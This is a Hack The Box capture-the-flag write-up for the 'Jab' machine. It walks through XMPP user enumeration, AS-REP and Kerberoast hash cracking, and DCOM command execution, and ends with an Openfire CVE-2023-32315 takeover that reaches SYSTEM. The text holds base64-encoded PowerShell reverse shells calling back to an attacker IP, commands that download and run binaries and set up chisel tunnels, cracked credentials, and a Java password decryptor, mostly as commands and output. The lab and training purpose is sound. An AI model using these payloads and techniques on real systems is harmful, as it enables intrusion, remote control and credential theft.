JAB
Recon
DNS (Port 53)
Nothing interesting so far
└─$ dig any 10.10.11.4
; <<>> DiG 9.19.21-1-Debian <<>> any 10.10.11.4
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54326
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;10.10.11.4. IN ANY
;; AUTHORITY SECTION:
. 3450 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024051901 1800 900 604800 86400
;; Query time: 8 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (TCP)
;; WHEN: Sun May 19 17:00:05 EDT 2024
;; MSG SIZE rcvd: 114Note: Since it's an actual DNS server we could add it in
/etc/resolv.conf
SMB (139,445)
└─$ smbclient --no-pass -L //jab.htb
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to jab.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableAfter cracking passwords from [[#Jabber/XMPP]]:
└─$ netexec smb jab.htb -u jmontgomery -p Midnight_121 --shares
SMB 10.10.11.4 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.4 445 DC01 [+] jab.htb\jmontgomery:Midnight_121
SMB 10.10.11.4 445 DC01 [*] Enumerated shares
SMB 10.10.11.4 445 DC01 Share Permissions Remark
SMB 10.10.11.4 445 DC01 ----- ----------- ------
SMB 10.10.11.4 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.4 445 DC01 C$ Default share
SMB 10.10.11.4 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.4 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.4 445 DC01 SYSVOL READ Logon server share┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ netexec smb jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw' --shares
SMB 10.10.11.4 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.4 445 DC01 [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
SMB 10.10.11.4 445 DC01 [*] Enumerated shares
SMB 10.10.11.4 445 DC01 Share Permissions Remark
SMB 10.10.11.4 445 DC01 ----- ----------- ------
SMB 10.10.11.4 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.4 445 DC01 C$ Default share
SMB 10.10.11.4 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.4 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.4 445 DC01 SYSVOL READ Logon server shareLDAP (389)
Certificate gives us domain name and DC domain name
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ tail -1 /etc/hosts
10.10.11.4 jab.htb DC01.jab.htbenum4linux came empty handed... hmm..
HTTP (47001)
No directory came up even with raft-medium-directories.txt wordlist and no subdomains were found for this port.
Jabber/XMPP
Few services are running this protocol so let's see what's going on.
Jabber: https://jabber.at/clients/ Client: https://pidgin.im
woyag:space
Not sure what happened, but after entering server IP it wouldn't let me login as woyag
New account: woyag2:Password123$
Add hostname to /etc/hosts
There seems to be 2 rooms:test said registration is requiredtest2 seems odd.
Looking around for features we can enumerate users:
For bdavis@conference.jab.htb says Offline
Accounts > Your Account > Search For Users > search.jab.htb > * > All Users
We can utilize Debug Window to get the table data, just repeat actions so debug window will log them:
Kerberos Users
Parse usernames:
from bs4 import BeautifulSoup as BS
with open('./table.xml') as f:
xml = BS(f.read(), 'lxml')
fields = xml.find_all('field', {'var': 'Username'})
with open('usernames.txt', 'w') as f:
for field in fields:
print(field.text.strip(), file=f)Now we can try this usernames against Kerberos service:
Impacket’s GetUserSPNs.py will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account’s password, which can then be bruteforced offline. source
└─$ impacket-GetUserSPNs -no-preauth "NO_PREAUTH_USER" -usersfile usernames.txt -dc-host "DC01.jab.htb" "jab.htb/" | tee kerberos.log
...
$krb5asrep$23$jmontgomery@jab.htb@JAB.HTB:4aeb86801c44b732b4de82d7004afe6c$8a8fdaff91773c899f61b2b50cf40481256089e34a4349e2f6ef4725d18fdab101765df93aee827d7f442ace74dadf4164df2213bb4aaff56a69144d1d53762e3850caa8084ff32cbfa12684ec0283e4692fbc96ceae2c0fce37d0ccc6a8ff25a23e27701518b740fea9e3dc86ef0578f5bdc6cd0f25e4f46811d1d3a93bb1e4c3b6708fcf1ced57cc43d19d47286e57907a1b413f5aa8b3606806e9d32669568f0a9e9db3b1253c0fbda362a2c05507ed3da867aed21de13a16a848b868e667eb6261edf33a5bc88687e04dc9af3c63b8422f1d31d915a4f5b79a27d639323368ae
$krb5asrep$23$lbradford@jab.htb@JAB.HTB:c14b48505a62f5f7a6c9e3c772ab77ee$7ea3083f8453493d32a5f3fd4c508df137217747e9d4e47e1729c628f12962ec9d021944026b1b4ae0cd6c15f54f7d0d5820edb5c69b1894b5d891412e8c4d033fe884e6aefcea02929ab6f652c4065a3be6f1e16dd9b5e5b3802f3c2dda184781c147fa14901dbfd0794dd15335a44f748d4f2a770a1ce7d9a3ce228d3ff89388754a7b2cfddc9901ce73e9cc38cf78c142287a9b550d804315073050a3cc4253253c63a6ab87cefb8ea65c798dff93392d2a6714186fdfb15368cafab8d40fed86d410eefecde29a2f62a18752969a84127a0d087eb7c9567f93b3911c9a7f8dba
$krb5asrep$23$mlowe@jab.htb@JAB.HTB:39c3fd2a3374066f4be89c3a8ad76a0b$4685df20b5a18c4e74ad3c67ff2dfaf28785eae37ed1f4e51486e3725913665fc77ab0cf011a0277e9dfd8fc9cc0959b15e8c51ff8b0d9344ed0a2613ac49d10c4da7169d4a2c80669a427d4b38b632bd295b790e4741cbf39c228b15bc92f69154219f204528673d3b73352d1966951fd1b833570f3935af705927c996af4531ec4d382c53303859115e7e3fc282f34de2f0c441a57a65e3fe26efd4b7b91f662c48b6386fbdfcf67896eb00b16b0ec3b2ed00b50a5b9c78bd66dacfeb31ea4eb2c32bd623b08aefae6a8cb2e15a209b9d1d22f382674e0f3f8ddaa836931baecdb
...
➜ .\hashcat.exe -m 18200 -a 0 .\hashes .\rockyou.txt
$krb5asrep$23$jmontgomery@jab.htb@JAB.HTB:4aeb86801c44b732b4de82d7004afe6c$8a8fdaff91773c899f61b2b50cf40481256089e34a4349e2f6ef4725dd18fdab101765df93aee827d7f442ace74dadf4164df2213bb4aaff56a69144d1d53762e3850caa8084ff32cbfa12684ec0283e4692fbc96ceae2c0fce37d0ccc6a8fff25a23e27701518b740fea9e3dc86ef0578f5bdc6cd0f25e4f46811d1d3a93bb1e4c3b6708fcf1ced57cc43d19d47286e57907a1b413f5aa8b3606806e9d326695688f0a9e9db3b1253c0fbda362a2c05507ed3da867aed21de13a16a848b868e667eb6261edf33a5bc88687e04dc9af3c63b8422f1d31d915a4f5b79a27d639323368ae::Midnight_121Creds:
jmontgomery:Midnight_121
I couldn't login in via winrm and smb had nothing too. Let's try credentials against XMPP service:
Leaked Account
(11/21/2023 01:31:13 PM) adunn: team, we need to finalize post-remediation testing from last quarter's pentest. @bdavis Brian can you please provide us with a status?
(11/21/2023 01:33:58 PM) bdavis: sure. we removed the SPN from the svc_openfire account. I believe this was finding #2. can someone from the security team test this? if not we can send it back to the pentesters to validate.
(11/21/2023 02:30:41 PM) bdavis: here are the commands from the report, can you find someone from the security team who can re-run these to validate?
(11/21/2023 02:30:43 PM) bdavis: $ GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson
Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------ -------- -------------------------- --------- ----------
http/xmpp.jab.local svc_openfire 2023-10-27 15:23:49.811611 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870cece4b6262e20f3bee38408d296ffbf07ceb421188b9b82ac0037ae67b488bb0ef2178a0792d62<SNIP>
(11/21/2023 02:30:56 PM) bdavis: $ hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
<SNIP>
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$4fea18693e1cb97f3e096288a76204437f115fe49b9611e339154e0effb1d0fcccfbbbb219da829b0ac70e8420f2f35a4f315c5c6f1d4ad3092e14ccd506e9a3bd3d20854ec73e62859cd68a7e6169f3c0b5ab82064b04df4ff7583ef18bbd42ac529a5747102c2924d1a76703a30908f5ad41423b2fff5e6c03d3df6c0635a41bea1aca3e15986639c758eef30b74498a184380411e207e5f3afef185eaf605f543c436cd155823b7a7870a3d5acd0b785f999facd8b7ffdafe6e0410af26efc42417d402f2819d03b3730203b59c21b0434e2e0e7a97ed09e3901f523ba52fe9d3ee7f4203de9e857761fbcb417d047765a5a01e71aff732e5d5d114f0b58a8a0df4ca7e1ff5a88c532f5cf33f2e01986ac44a353c0142b0360e1b839bb6889a54fbd9c549da23fb05193a4bfba179336e7dd69380bc4f9c3c00324e42043ee54b3017a913f84a20894e145b23b440aff9c524efb7957dee89b1e7b735db292ca5cb32cf024e9b8f5546c33caa36f5370db61a9a3facb473e741c61ec7dbee7420c188e31b0d920f06b7ffc1cb86ace5db0f9eeaf8c13bcca743b6bf8b2ece99dd58aff354f5b4a78ffcd9ad69ad8e7812a2952806feb9b411fe53774f92f9e8889380dddcb59de09320094b751a0c938ecc762cbd5d57d4e0c3d660e88545cc96e324a6fef226bc62e2bb31897670929571cd728b43647c03e44867b148428c9dc917f1dc4a0331517b65aa52221fcfe9499017ab4e6216ced3db5837d10ad0d15e07679b56c6a68a97c1e851238cef84a78754ff5c08d31895f0066b727449575a1187b19ad8604d583ae07694238bae2d4839fb20830f77fffb39f9d6a38c1c0d524130a6307125509422498f6c64adc030bfcf616c4c0d3e0fa76dcde0dfc5c94a4cb07ccf4cac941755cfdd1ed94e37d90bd1b612fee2ced175aa0e01f2919e31614f72c1ff7316be4ee71e80e0626b787c9f017504fa717b03c94f38fe9d682542d3d7edaff777a8b2d3163bc83c5143dc680c7819f405ec207b7bec51dabcec4896e110eb4ed0273dd26c82fc54bb2b5a1294cb7f3b654a13b4530bc186ff7fe3ab5a802c7c91e664144f92f438aecf9f814f73ed556dac403daaefcc7081957177d16c1087f058323f7aa3dfecfa024cc842aa3c8ef82213ad4acb89b88fc7d1f68338e8127644cfe101bf93b18ec0da457c9136e3d0efa0d094994e1591ecc4:!@#$%^&*(1qazxsw
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4
Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs)
Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14336000/14344385 (99.94%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103]
Started: Fri Oct 27 15:30:09 2023
Stopped: Fri Oct 27 15:30:29 2023
(11/21/2023 02:31:57 PM) adunn: I'll pass this along and circle back with the group
(11/21/2023 02:32:23 PM) bdavis: perfect, thanks Angela!
(11/21/2023 01:22:55 PM) The topic is: Creds:
svc_openfire:!@#$%^&*(1qazxsw
Enum4linux dumps lots of information, but mainly users and groups which isn't helpful at the moment.
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ enum4linux -u svc_openfire -p '!@#$%^&*(1qazxsw' -a jab.htb | tee enum4linux.logRPC
https://book.hacktricks.xyz/network-services-pentesting/135-pentesting-msrpc#executing-a-rce-with-valid-credentials
Impacket’s dcomexec.py provides an interactive shell on the Windows host similar to wmiexec.py, but using varying DCOM endpoints. source
https://medium.com/@iamkumarraj/exploring-impacket-dcomexec-enhancing-active-directory-attack-capabilities-a9663d383703impacket-dcomexec -object MMC20 <domain>/<username>:'<password>'@10.x.x.x 'cmd.exe /c powershell -e <reveseshell> -silentcommand
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA0ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -silentcommand
User.txt
PS C:\users\svc_openfire> tree /f
Folder PATH listing
Volume serial number is E59D-A256
C:.
????Desktop
? user.txt
PS C:\users\svc_openfire> cat desktop/user.txt
5b068fa3a3b9a30f8771f525c655d366Privilege Escalation
PS C:\users\svc_openfire> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\users\svc_openfire> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Distributed COM Users Alias S-1-5-32-562 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448There are lots of Openfire processing running, worth checking out.
I don't think Choco has anything useful so let's go to Openfire
Openfire
The version seems to be 4.7.5
PS C:\program files\Openfire> cat changelog.html | sls '<h2>.* -- <span' | select -first 5
<h2>4.7.5 -- <span style="font-weight: normal;">May 23, 2023</span></h2>
<h2>4.7.4 -- <span style="font-weight: normal;">November 9, 2022</span></h2>
<h2>4.7.3 -- <span style="font-weight: normal;">August 2, 2022</span></h2>
<h2>4.7.2 -- <span style="font-weight: normal;">July 13, 2022</span></h2>
<h2>4.7.1 -- <span style="font-weight: normal;">February 16, 2022</span></h2>I already encountered Openfire, but version 4.7.4. [[Labs/HackTheBox/Seasonal/Season 5/SolarLab/Writeup|Writeup]]
Approach is the same:
PS C:\program files\Openfire\embedded-db> cat openfire.script | sls 'INSERT INTO (OFUSER|OFPROPERTY) VALUES' | sls admin
INSERT INTO OFUSER VALUES('admin','YgjeJXvFDf4dkSVd0v7ONC+MO8w=','3EHtXqOQxksAuSWAlW9BLaRapkE=','q6Ws2+ZEcDab+zFdBmYDQdWIaZwbfn6z',4096,NULL,'b3623187c74becad09de392aa14b0b08427dc47a78c232aa6bc63423d20e133c0473e10622652724989ca9655a8f87eff512c1ac13ac47cfa6ca3cd3687a81dd868a5cc48cef5a5e','Administrator','admin@jab.htb','001698357611581','0')
INSERT INTO OFPROPERTY VALUES('admin.authorizedJIDs','admin@jab.htb,svc_openfire@jab.htb',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.admin.className','org.jivesoftware.openfire.admin.DefaultAdminProvider',0,NULL)
PS C:\program files\Openfire\embedded-db> cat openfire.script | sls 'INSERT INTO (OFUSER|OFPROPERTY) VALUES' | sls passwordKey
INSERT INTO OFPROPERTY VALUES('passwordKey','zBgWeJBtP2RiZIu',0,NULL)OpenFireDecryptPass.java
```java import javax.crypto.Cipher; import java.security.MessageDigest; import javax.crypto.spec.SecretKeySpec; import javax.crypto.spec.IvParameterSpec;
public class OpenFireDecryptPass { public static void main(String[] argv) throws Exception { if (argv.length < 2) { System.out.println("[-] Please specify the encypted password and the "passwordKey""); return; }
MessageDigest md = MessageDigest.getInstance("SHA-1");
byte[] keyParam = md.digest(argv[1].getBytes("utf8"));
byte[] ivBytes = hex2bytes(argv[0].substring(0, 16));
byte[] encryptedString = hex2bytes(argv[0].substring(16)); // 8 * 2 (since hex)
IvParameterSpec iv = new IvParameterSpec(ivBytes);
SecretKeySpec key = new SecretKeySpec(keyParam, "Blowfish");
Cipher cipher = Cipher.getInstance("Blowfish/CBC/PKCS5Padding");
cipher.init(Cipher.DECRYPT_MODE, key, iv);
byte[] decrypted = cipher.doFinal(encryptedString);
String decryptedString = bytes2hex(decrypted);
System.out.println(new String(decrypted) + " (hex: " + decryptedString + ")");
}
public static byte[] hex2bytes(String str) {
if (str == null || str.length() < 2) return null;
else {
int len = str.length() / 2;
byte[] buffer = new byte[len];
for (int i = 0; i < len; i++) buffer[i] = (byte) Integer.parseInt(str.substring(i * 2, i * 2 + 2), 16);
return buffer;
}
}
public static String bytes2hex(byte[] data) {
if (data == null) return null;
else {
int len = data.length;
String str = "";
for (int i = 0; i < len; i++) {
if ((data[i] & 0xFF) < 16) str = str + "0" + java.lang.Integer.toHexString(data[i] & 0xFF);
else str = str + java.lang.Integer.toHexString(data[i] & 0xFF);
}
return str.toUpperCase();
}
}}
</details>
```bash
└─$ cp ../SolarLab/OpenFireDecryptPass.class .
└─$ java OpenFireDecryptPass b3623187c74becad09de392aa14b0b08427dc47a78c232aa6bc63423d20e133c0473e10622652724989ca9655a8f87eff512c1ac13ac47cfa6ca3cd3687a81dd868a5cc48cef5a5e zBgWeJBtP2RiZIu
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
odW!!mVfbXs304kskt!QAZDVGY&@ (hex: 006F0064005700210021006D00560066006200580073003300300034006B0073006B0074002100510041005A004400560047005900260040)Creds:
admin:odW!!mVfbXs304kskt!QAZDVGY&@
No luck with admin password, looks like we need exploit the Openfire itself.
PS C:\users> cd $ENV:TEMP
PS C:\Windows\TEMP> curl -uri http://10.10.16.74/rc.exe -outfile rc.exe
PS C:\Windows\TEMP> .\rc.exe Administrator 'odW!!mVfbXs304kskt!QAZDVGY&@' cmd.exe -r 10.10.16.74:4444
[-] RunasCsException: LogonUser failed with error code: The user name or password is incorrect
PS C:\Windows\TEMP> .\rc.exe Administrator 'odW!!mVfbXs304kskt!QAZDVGY&@' whoami
[-] RunasCsException: LogonUser failed with error code: The user name or password is incorrect
PS C:\Windows\TEMP>Port forwarding using Chisel:
PS C:\Users\svc_openfire> cmd /c echo %PROCESSOR_ARCHITECTURE%
AMD64
PS C:\Users\svc_openfire> curl -uri http://10.10.16.74/chisel_1.9.1_windows_amd64 -outfile chisel.exe
PS C:\Users\svc_openfire> ls chisel.exe
Directory: C:\Windows\TEMP
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/20/2024 5:50 AM 9006080 chisel.exe
PS C:\Users\svc_openfire> .\chisel.exe client 10.10.16.74:3000 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091
Login as admin: https://github.com/miko550/CVE-2023-32315
Upload jar file:
Execute powershell reverse shell:
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA0ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.4:57616.
PS C:\Program Files\Openfire\bin> whoami
nt authority\system
PS C:\Program Files\Openfire\bin> cd /users/administrator/desktop
PS C:\users\administrator\desktop> ls
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/19/2024 5:04 PM 34 root.txt
PS C:\users\administrator\desktop> cat root.txt
1092b34c577d548e8cc7925cc1880ed4Help used:
https://medium.com/@islem.meghnine/hackthebox-jab-writeup-4515ffad3bf7
https://blog.csdn.net/weixin_45557138/article/details/136919900
Last updated